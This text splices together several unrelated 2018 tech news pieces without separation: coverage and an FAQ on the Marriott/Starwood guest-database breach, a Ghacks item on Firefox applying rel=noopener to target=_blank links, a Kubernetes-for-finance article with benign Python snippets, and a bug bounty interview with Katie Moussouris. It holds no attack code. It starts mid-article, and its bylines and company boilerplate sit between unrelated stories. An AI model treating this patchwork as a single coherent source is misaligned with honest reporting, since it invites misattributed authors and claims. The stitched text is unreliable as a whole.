Watch out for phishing attempts. “Phishing attempts can be more credible when someone has access to actual personal details,” says Auth0 Principal Security Engineer Emory Lundberg. This hack includes data that could make social engineering attempts easier. For more advice on avoiding phishing attempts, check out this post by Annybell Villarroel, Auth0 Security Operations Manager.


[Image source: Pixabay]

Marriott's Data Breach Response Plan

In addition, Marriott has taken the following steps to help guests monitor and protect their information:

Dedicated Call Center

Marriott has established a dedicated call center to answer questions you may have about this incident. The call center is open seven days a week and is available in multiple languages. Our dedicated call center may experience high call volume initially, and we appreciate your patience.

Email Notification

Marriott began sending emails on a rolling basis on November 30, 2018 to affected guests whose email addresses are in the Starwood guest reservation database.

Free WebWatcher Enrollment

Marriott is providing guests the opportunity to enroll in WebWatcher free of charge for one year. WebWatcher monitors internet sites where personal information is shared and generates an alert to the consumer if evidence of the consumer’s personal information is found. Due to regulatory and other reasons, WebWatcher or similar products are not available in all countries. Guests from the United States who complete the WebWatcher enrollment process will also be provided fraud consultation services and reimbursement coverage for free. Click on your country, if listed, to begin the enrollment process.

About Auth0

Auth0, a global leader in Identity-as-a-Service (IDaaS), provides thousands of enterprise customers with a Universal Identity Platform for their web, mobile, IoT, and internal applications. Its extensible platform seamlessly authenticates and secures more than 1.5B logins per month, making it loved by developers and trusted by global enterprises. The company's U.S. headquarters in Bellevue, WA, and additional offices in Buenos Aires, London, Tokyo, and Sydney, support its customers that are located in 70+ countries.

For more information, visit https://auth0.com or follow @auth0 on Twitter.


Firefox security: rel=noopener for target=_blank

Mozilla is currently testing a new security feature in Firefox Nightly that adds rel="noopener" automatically to links that use target="_blank".

Target="_blank" instructs browsers to open the link target in a new tab in the web browser automatically; without the target attribute, links would open in the same tab unless users use built-in browser functionality, e.g. by holding down Ctrl or Shift, to open the link in a different way.

Rel="noopener is supported by all major web browsers. The attribute makes sure that window-opener is null in modern browsers. Null means that it contains no value.

If rel="noopener" is not specified, linked resources have full control over the originating window object even if the resources are on different origins. The destination link could manipulate the originating document, e.g. replace it with a lookalike for phishing, display advertisement on it or manipulate it in any other way imaginable.

You can check out a demo page on rel="noopener" abuse here . It is harmless but highlights how destination sites may alter the originating site if the attribute is not used.


Rel="noopener" protects the originating document. Webmasters can -- and should -- specify rel="noopener" whenever they use target="_blank"; we use the attribute on all external links here on this site already.

Apple implemented a change in Safari in October that applies rel=noopener automatically to any link that uses target=_blank.

The Nightly version of Firefox supports the security feature as well now. Mozilla wants to collect data to make sure that the change does not break anything major on the Internet.

The preference dom.targetBlankNoOpener.enable controls the functionality. It is only available in Firefox 65 and set to true by default (which means that rel="noopener" is added).


Firefox users may change the preference to turn off the feature. While it is not recommended because of the security implications, you may want to do so if you run into compatibility issues.

Load about:config?filter=dom.targetBlankNoOpener.enable in the browser's address bar. Confirm that you will be careful if the warning prompt is displayed. Double-click on the preference.

A value of true means that rel="noopener" is added to links with target="_blank", a value of false that it is not.

Mozilla targets Firefox 65 for the Stable release. Things may get delayed depending on issues that may be reported or noticed. Firefox 65 will be released on January 29, 2019. (via Sören Hentzschel)

Author: Martin Brinkmann, Ghacks Technology News

Making Kubernetes a Reality for Financial Services

Terry Shea

Terry Shea is Chief Revenue Officer for Kublr, the most comprehensive enterprise Kubernetes platform.

The financial services industry has traditionally been very technology dependent, but often has trouble adopting new technologies. The payments sector is somewhat of an exception to this. M-Pesa for example, the mobile payments solution from Vodafone and its subsidiaries that enables unbanked individuals in Africa, India and elsewhere to receive and make payments, has been around for over a decade. Closer to home, teens and tweens are now splitting the cost of a pizza or an Uber using apps like Venmo, which has seen 80 percent growth this year.

Many of these financial technology firms (“fintechs”) have taken advantage of modern application architectures and DevOps practices that are associated with “cloud native” technologies. Monzo, the “mobile” U.K. bank, discussed this in their presentation “Building a Bank With Kubernetes.” They released their annual report in July citing growth from 0 to 750,000 customers in 3 years. And Monzo is not alone. A recent U.S. Government report highlighted the growth of financial services by non-bank firms, chiefly fintechs. Some of the more striking data points:

3,300 fintech firms were created between 2010 and 2017
Financing of fintech firms reached $22 Billion in 2017
Personal loans by these firms went from 1 percent to 36 percent of loans in that period

Oleg Chunikhin, CTO, Kublr

Oleg Chunikhin has been working in the field of software architecture and development for nearly 20 years. Oleg joined Kublr as the CTO in 2016. Oleg has championed the standardization of DevOps in all the company does and is a firm believer in driving the adoption of automation and artificial intelligence applications. Oleg holds a Bachelor of Mathematics and a Master of Applied Mathematics and Computer Science from Novosibirsk State University and is an AWS Certified Software Architect.

So what is cloud native, how does it impact application development and IT Operations, and how can traditional financial services firms leverage it to compete with newer fintechs?

The Cloud Native Computing Foundation (CNCF) charter described cloud native applications as having the following characteristics:

Container packaged
Dynamically managed
Microservices oriented

Containerization enables rapid deployment and updating of applications. This is particularly true when microservices are used. And the dynamic orchestration is achieved through Kubernetes. Kubernetes handles deployments, maximizes resource utilization, provides “desired state management” capabilities, and enables application auto-scaling.

Most development teams find that using containers in their application development processes is not too difficult, but IT operations teams usually have much less experience with Kubernetes. Complicating this is the fact that most established financial services firms can’t or won’t get rid of monolithic core applications overnight. Unlike Monzo, which wrote its back-end in microservices, established financial services firms will need to architect hybrid applications with cloud-native front-ends running either in the cloud, in their data centers, or both, and connecting to back-end services running in the data center.

The Kublr platform enables IT Operations teams to deploy, run, and manage Kubernetes wherever they wish, but to architect a total solution there are several factors to consider. We provide our recommendations below:

Some Considerations Before Going Cloud Native with Kubernetes

Being able to develop, run, and manage cloud native applications in multiple environments means financial services must consider how they will address some key issues:

Leveraging the Scalability of the Cloud: Horizontal Pod Autoscaling vs. Node Autoscaling

Containers, container orchestration, and microservice technologies like Kubernetes and Istio promise scalability and rapid response to changing resource demands. However, running containers still requires a real infrastructure ― whether physical or virtual machines. To help leverage the cloud’s scalability, Kubernetes supports scaling on two levels: 1) horizontal pod (auto)scaling, and 2) node (auto)scaling.

While horizontal pod scaling scales applications horizontally increasing and reducing the number of running container replicas, it doesn’t take into account the infrastructure; it merely assumes there is going to be enough resources to start new container replicas when necessary.

Node scaling, on the other hand, is concerned with (automatically) adding new nodes to the cluster when more resources are needed, and stopping or removing underutilized nodes when not needed anymore.

Horizontal pod scaling is usually much faster; reaction time takes seconds vs. minutes for node scaling. Yet both technologies are needed to realize the benefits of automatic scaling in the cloud.
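As a concrete illustration of the pod-level half, the sketch below uses the official Kubernetes Python client to attach a HorizontalPodAutoscaler to a hypothetical web-frontend Deployment. The deployment name, namespace, and thresholds are made-up examples, and node autoscaling would still need to be configured separately at the infrastructure layer (for example with a cluster autoscaler):

# Hedged example: create an HPA for an assumed "web-frontend" Deployment.
from kubernetes import client, config

config.load_kube_config()  # or config.load_incluster_config() inside a pod

hpa = client.V1HorizontalPodAutoscaler(
    metadata=client.V1ObjectMeta(name="web-frontend"),
    spec=client.V1HorizontalPodAutoscalerSpec(
        scale_target_ref=client.V1CrossVersionObjectReference(
            api_version="apps/v1", kind="Deployment", name="web-frontend"),
        min_replicas=2,                        # keep a baseline for availability
        max_replicas=20,                       # cap cost and backend load
        target_cpu_utilization_percentage=70,
    ),
)

client.AutoscalingV1Api().create_namespaced_horizontal_pod_autoscaler(
    namespace="default", body=hpa)

For a financial-services workload the max_replicas cap is worth thinking about: as the next section notes, a front end that scales without limit can overwhelm a backend core system that cannot.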

Cloud Native Front-End Applications that Talk to Monolithic Backend Apps (e.g., Core Banking Systems)

Sometimes migration to a cloud native architecture requires additional considerations, such as availability requirements related to compliance and pre-existing technology. For example, a mainframe database that isn’t easily scalable may require special precautions to ensure that cloud native applications in the presentation tier scaling up and down do not affect the availability of backend databases.

Aligning Current Dev, QA, and Release Processes with a Faster Release Schedule

The new cloud native technology stack doesn’t only affect application development and delivery tools; it also requires QA and release process changes. Responsibilities shift and require adjustments to align with the faster release schedule. By its very nature, the infrastructure-as-code approach shifts certain infrastructure management concerns to Dev and introduces new DevOps practices. Some organizations adopt SRE (Site Reliability Engineer) roles to consolidate responsibilities for application quality and availability, and close the gaps between operations, QA, and development teams. In any case, processes and business are affected and need to be adjusted to get the best value out of the technology modernization.

Scaling Cluster and Application Monitoring and Providing the Right Visibility and Alerts to Dev and Ops Teams

A cloud native approach usually implies changes in application monitoring, visibility practices, and technologies. The most notable change is probably that cloud-native application identity and localization are much more fluid ― application components include multiple (and dynamically changing) replicas that move freely between nodes within the clusters ― or even across clusters ― and scale up and down; cluster nodes lack identity and can be stopped and started again in response to changing demand. The application components consist of replicas from different versions and variants, and re-route traffic based on needs, e.g., rolling out a new feature, A/B testing, etc.

These dynamic environments call for new tools, such as Prometheus, Grafana, InfluxDB, M3, ELK stack, FluentD, and Jaeger, to name a few. Integration of these monitoring tools requires serious consideration and planning.

Trouble-Shooting Microservices with Jaeger, Zipkin and Other Solutions

Traceability is one aspect of monitoring and visibility that becomes particularly important as cloud native migration efforts move further along and switch focus from an infrastructure and platform layer to application refactoring. Replacing monoliths with a microservices architecture brings a number of advantages, but also comes with its own challenges, and traceability is one of them. Jaeger, Zipkin and other frameworks emerged to close this gap. They normally integrate well with cloud native microservices frameworks like Istio and container orchestration tools like Kubernetes.
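To make that concrete, here is a minimal sketch using the jaeger-client Python package: it emits one trace span for a hypothetical payment lookup so the call can later be inspected in Jaeger's UI. The service name, span name, and tags are invented for the example, and a production service would propagate span context across HTTP/gRPC calls rather than trace a single local operation:

# Hedged example: report a single span to a local Jaeger agent.
import time
from jaeger_client import Config

config = Config(
    config={
        "sampler": {"type": "const", "param": 1},  # sample every trace
        "logging": True,
    },
    service_name="payments-gateway",
    validate=True,
)
tracer = config.initialize_tracer()

with tracer.start_span("lookup-card-on-file") as span:
    span.set_tag("customer.tier", "gold")
    time.sleep(0.05)                               # stand-in for a downstream call
    span.log_kv({"event": "core-banking-response", "status": "ok"})

tracer.close()
time.sleep(1)  # give the async reporter time to flush before the process exits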

Securing Container Deployments: Container Scanning, Trusted Registries, Admin IAM, and Communication Between Nodes

Security is another facet of the new stack that requires careful consideration and planning. Container security was a legitimate reason for concerns, similar to virtualization security in the early days of virtualization adoption. And just like with virtualization, demand for reliable container security results in solutions being developed and adopted on all levels of the stack:

Container isolation and security technologies ― Kubernetes and Docker integration with SELinux and AppArmor, Linux cgroups and namespaces;
Infrastructure security ― integration of container orchestration frameworks with the infrastructure management layer (such as AWS, Azure, and other providers for Kubernetes), plus security policy management and governance across the infrastructure and container orchestration layers;
Network security across levels ― infrastructure (VPCs, subnets, routing, network policies, security groups, etc.), containers (overlay network providers, e.g., Weave with transparent encryption), container orchestration (Kubernetes network policies, TLS, etc.), and application (e.g., Istio with transparent encryption);
Application security ― transparent authentication and authorization at the application-framework level, such as Istio;
Container image security ― the image repository and the processes supporting image validation, scanning, signing, and manual and automatic approval, plus Kubernetes admission controllers to enforce image deployment policies;
Support for updates and security patches for all components and layers.

The Cloud Native Future with Kubernetes

Across the industry, we are already seeing innovative financial services firms start to address all of these issues. Cloud native architectures are driving innovation in data science, IoT, and other areas that will provide both the threat of being disrupted and the opportunity for innovation.

The Cloud Native Computing Foundation is a sponsor of The New Stack.

Feature image via Pixabay.

Marriott International: Hackers Accessed the records of 500 Million Users


“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken”

Hotel and lodging chain Marriott International has revealed that it has been the subject of a massive data hack in which threat actors have copied the personal information of over 500 million Marriott guests.

On September 8th of this year Marriott was alerted by an internal security tool that someone had tried to illegally access the guest reservation database of its Starwood customers. Starwood was a separate hotel chain before its acquisition by Marriott International in 2016.

Marriott say that they quickly engaged security experts to analyse the threat, and they discovered that there had been unauthorised access to the Starwood database as far back as 2014.

The threat actor had copied and encrypted information; cyber analysts later decrypted the data and identified it as the Starwood guest reservation database.

Marriott International, in a press release addressing the issue, stated that so far it has identified approximately 500 million guest records and that for “327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number”, as well as “Starwood Preferred Guest (‘SPG’) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.”

Marriott Hack

Some of the account records do contain credit card numbers and payment card expiration dates. Customer payment records were encrypted with AES-128, the common Advanced Encryption Standard.

However, Marriott note that: “There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.”

Tom van de Wiele, security consultant, F-Secure, commented in an emailed statement that: “The hack was targeted at a part of the company that Marriott acquired a few years ago, being Starwood.”

“This is a common trend where it’s usually not the main company that is targeted but rather attackers aim to compromise the softer underbelly of the organisation, which are usually IT service providers, contractors and other entities with a high number of interactions within the company.”

“Interactions mean a lot of moving parts to try and control, while other acquisition and fusion efforts are going on. Things like the integration of IT systems and the security thereof take a lot of time between two companies that have to merge requirements, security policies, IT environments, technology stack and company cultures.”

Marriott International have set up support lines to help anyone affected and have contacted all the relevant policing and regulatory bodies in relation to the hack. They have also begun to step up the process of phasing out the Starwood systems.

See Also: Landmark GCHQ Publication Reveals Vulnerability Disclosure Process

Aatish Pattni, regional director for UK & Ireland for cybersecurity vendor, Link11 commented in an emailed statement that: “This follows the trend we have seen in the attacks against the aviation industry this year: these, and the related travel and hospitality sectors process and store huge amounts of high-value personal information such as passport numbers, credit-card details and more.

“Although it’s not certain that the stolen data has been used as yet, people who think they may be affected should be wary of any email communications they receive relating to the breach and should not share any other sensitive details by email. Scammers often prey on peoples’ concerns to try and harvest more data so that they can use stolen payment card details or commit other types of fraud.”

Newsmaker Interview: Katie Moussouris on Improving Bug Bounty Programs

The bug bounty “queen” Katie Moussouris discusses the biggest mistakes that companies launching these programs are making.

Bug bounty programs continue to increase in popularity but that popularity has its downsides.

Since the launch of the Hack the Pentagon program in 2016, bug bounty programs have quickly grown in popularity. Bugcrowd’s State of Bug Bounty report this year found that the number of programs launched in the past year has jumped by 40 percent.


That includes players such as Google, Facebook, and Microsoft offering high rewards, and with good reason. The programs have helped unearth important vulnerabilities, including a serious flaw in Chrome on Google’s Pixel in 2018 and a massive Facebook remote code execution flaw in 2017.

However, as more programs are created, some companies are forgetting the real reason behind bug bounties. That is, instead of making their systems more secure, companies want to merely hunt bugs. Threatpost talked to Katie Moussouris, founder of Luta Security, to hear more about her thoughts on the challenges in developing and launching bug bounty programs.

What are the biggest issues we’re seeing with bug bounty programs right now?

It’s a cause that I have been taking on for the better part of the year at this point. I have noticed that, unlike five years ago when I launched Microsoft’s bug bounty program, the general acceptance for bug bounties has skyrocketed. Just this past year, bounty programs have eclipsed apparent demand for traditional penetration testing.

The overall thing is while it’s been good that people are embracing outside help from security researchers and hackers, what has been detrimental is the overuse of bug bounties as a cure-all for all of your security problems.

When I was part of a bug bounty company I very much disapproved of any messaging that said things like, ‘get a bug bounty program to prevent breaches.’ That’s just false. That’s not something that will prevent a breach, just like getting penetration testing doesn’t prevent a breach.

Say I’m developing a bug bounty program, what’s the very first step?

When you’re thinking about a bug bounty program, the very first step you should do, is ask yourself, why? What is the problem you’re actually trying to solve? So many of my customers, they come to me and say, ‘You’re the bug bounty Queen, we want to hire you to help us architect this bug bounty.’ And I say, why do you need a bug bounty right now?

They might say things like, ‘Well, you know, we don’t have anybody to handle incoming bugs.’ And I ask them all, how many incoming bugs are you getting on average per year? And they’ll say some ridiculously small number like five, or 10 or 12. And I’ll say, wait a minute, you’re feeling overwhelmed with 10 or 12 bugs, and you think starting a bug bounty will help with that? They’ll recite the marketing of the bug bounty companies, where the bug bounty companies have been saying, we take all the hassle out of it, we do a managed program, and those words ‘managed program’ sound really great to them. But what they don’t understand is, it doesn’t matter. You know, they basically just attracted a swarm of bees.

What’s the correct approach for bug bounty programs?

It’s a mixture of different approaches. Bug bounties can definitely be very helpful, especially if you’re being smart about targeting them. A bug bounty program can help bring out a particular area that you’re looking for not just a bug. Maybe you’re looking for people who you can target to hire eventually. So bug bounties can be helpful in that way.

But that in-house expertise, that’s really what people need to build in terms of long-term sustainable security. You’re never going to be able to outsource your bug hunting completely. The most inefficient way to find bugs is after it’s already out there, after the website is up, or the software is released, or the product is released, and asking a bunch of internet people to help you secure it.

That’s definitely against what the security industry has been preaching for the last 20 years. And yet the bug bounty companies, and their marketing departments with millions of dollars of VC backing, have effectively made the case for bounty programs. Simply put, bug bounty programs are sold as bigger solutions to the problem of finding and patching vulnerabilities than they really are.

Do you think that bug bounty hunters and program creators are on the same page about what it means to have a successful program?

Definitely not, because the bug bounty hunters, even the best of them, are getting told a lot of the time that their submission is a duplicate.

The way that happens is, obviously, more than one person finding the same flaw. And that happens more frequently the less mature the software target is. So even the experienced bug hunters who should be able to make a really decent living doing this are still encountering issues, because only the first person to report a particular bug gets paid. They’re still doing the work and their expertise is still being utilized, but they’re not getting paid for it some of the time.

So it’s not just competition among fellow bug hunters. There’s also the fact that the triage personnel at these bug bounty companies are actually not full-time employees; most of them are contractors, and many of them are also bug bounty hunters. It’s basically, you know, a little fox-in-the-henhouse thing going on.

I’ve certainly seen bug bounty hunters refuse to submit bugs to certain platforms, because they know fellow bug bounty hunters who are competing with them are now able to see their bug submissions. And they’re feeding really good bug reports and proof of concepts… to their competitors in this market.

What are customers’ main questions and concerns when they come to you to ask about bug bounty programs?

It’s a lot of customers who are thinking about managing different pain points in the process. It’s always a legitimate reason why they need help. They might think that a bug bounty is the solution or is the help they need.

But actually, some people come to me because they have dysfunctional bug bounty programs and they need help rejuvenating them in some way. It hasn’t worked well for them, or the quality of bugs is low. For some companies, a bounty program is effectively just more noise.

Even with the managed programs, where a company may no longer be getting anything of value, they’re paying the bug bounty company to continue to monitor. And so they’re paying, they’re outsourcing and they’re not actually getting in quality bug submissions. That’s when they come to me asking for help.

I think the real challenge for companies is, a lot of them realize that because they’ve already started a bug bounty, they can’t just shut it down. They have to figure out how to process the information so that it’s not just a one-time payment to a hacker, fixing the bug, and that’s all the value you get out of the program and relationship. We’re trying to basically make it so that a bug bounty program is one key part of the overall secure development life cycle.

Marriott Starwood hotel data breach FAQ: What 500 million hacked guests need to know

It’s been a couple of months since a major company unveiled a data breach that affected millions of people, so it’s time for a new one. The Marriott hotel chain has announced a major database breach that could affect anyone who stayed at its 6,700 worldwide Starwood hotel properties since 2014―up to 500 million people in total.

That’s a lot of people and a long stretch of time, so check out our FAQ for all of the information:

What happened?

Marriott says it received an alert from an internal security tool on September 8 warning of an attempt to access the Starwood guest reservation database in the United States. In its investigation of the incident, Marriott learned that an unauthorized party gained access to the company’s customer database and “copied and encrypted information, and took steps toward removing it.”

How did the hackers get in?

Marriott isn’t being totally clear here, but it appears as though this wasn’t the usual exploit of a vulnerability. Rather, someone without the proper credentials was able to access the Marriott reservation database to make a duplicate encrypted copy of customer information, which was then presumably taken outside the system.

How far back does the breach go?

Marriott says the unauthorized access goes back to 2014.

Why wasn’t Marriott alerted sooner?

Also unclear, but perhaps the unauthorized party only recently started accessing the system. Or possibly Marriott recently installed new security software that was able to detect the access.

Why are we just hearing about it now?

Marriott says it was only able to decrypt the files on November 19, and is still working to uncover the scope of the breach.

What was stolen?

Marriott is still sorting through the data it was able to recover, but for most customers, the following data may have been stolen: name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, and arrival and departure information, along with reservation dates and communication preferences.

What about credit card information?

For some users, Marriott says payment card numbers and payment card expiration dates were included in the stolen data, but card numbers were encrypted using Advanced Encryption Standard encryption (AES-128).

So my credit card is safe?

Possibly not. As Marriott explains: “There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.”

What about my SPG points?

Marriott says there is no evidence that any loyalty points were obtained, but you should check your account for any suspicious activity.

Has the breach been stopped?

Presumably, but Marriott doesn’t explicitly say whether the unauthorized access has been shut down. However, the chain is working with law enforcement agencies and regulatory authorities, so the likelihood of a continued breach is extremely low.

What is Marriott doing to stop future breaches?

Again, it’s not totally clear whether the hacker exploited a vulnerability or merely used an unauthorized password, but Marriott says it is devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to its network.

How do I know if my data was accessed?

Marriott began sending emails on a rolling basis on November 30 to affected guests, so be sure to check your spam folder if you haven’t received one.

What can I do if I was affected?

Marriott has set up a dedicated call center to answer any questions you may have. U.S. Customers can call 877-273-9481 seven days a week to reach a representative.

Should I change my password?

Marriott hasn’t said whether any accounts were accessed or passwords stolen, but it certainly can’t hurt. Keep in mind, though, that this was a breach of the company’s internal database of hotel guests, not of online accounts.

Should I cancel my credit card?

Also not a bad idea. If you know the credit card or cards that are on file with Marriott or Starwood hotels, cancelling them now is the best way to prevent any future malfeasance.

What else can I do?

Marriott is providing all guests in the U.S., Canada, the UK with the opportunity to enroll in Kroll’s Web Watcher Monitoring Service , which tracks sites where personal information is shared and alerts you if evidence of your personal information is found.

